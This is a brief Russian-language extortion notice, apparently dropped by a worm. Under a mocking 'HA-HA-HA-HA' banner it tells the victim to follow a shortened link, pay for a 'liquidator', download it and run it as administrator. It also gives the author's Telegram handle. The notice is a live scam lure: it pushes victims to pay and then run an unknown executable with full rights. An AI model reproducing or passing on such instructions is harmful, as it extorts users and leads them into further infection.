+++++++++++++++++++++++++++++++++++++++
############# HA-HA-HA-HA #############
+++++++++++++++++++++++++++++++++++++++

-- как ликвидировать червя?

-- 1. перейти по ссылке внизу.
-- 2. написать о приобретении.
-- 3. приобрести ликвидатор.
-- 4. скачать ликвидатор.
-- 5. запустить от имени администратора.

-- ждать окончания ликвидации.
-- по окончании можете смело пользоваться ОС.

-- Author: ⁶ ʰ ᵒ ˢ †
-- Telegram: t.me/are_you_okays

 > https://vk.cc/cC08HF
+++++++++++++++++++++++++++++++++++++++